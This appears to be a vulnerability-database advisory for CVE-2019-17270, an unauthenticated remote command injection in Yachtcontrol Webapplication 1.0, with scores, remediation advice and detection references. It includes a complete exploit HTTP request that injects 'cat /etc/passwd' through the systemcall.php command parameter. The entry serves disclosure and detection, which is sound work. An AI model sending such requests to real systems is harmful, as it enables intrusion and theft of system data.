🔙 목록으로 돌아가기

CVE-2019-17270: Yachtcontrol Webapplication 1.0 - Remote Command Injection

TitleYachtcontrol Webapplication 1.0 - Remote Command Injection
Authorpikpikcu
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
RemediationApply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability.
CVSS Score9.8
EPSS Score0.93937
CVE IDCVE-2019-17270
CWE IDCWE-78
Tags cve cve2019 rce yachtcontrol edb packetstorm vkev vuln

🔍 Vulnerability Description

Yachtcontrol Webapplication 1.0 makes it possible to perform direct operating system commands as an unauthenticated user via the “/pages/systemcall.php?command={COMMAND}” page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco’s.

🌐 HTTP Request

GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.5 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17270.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-17270.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A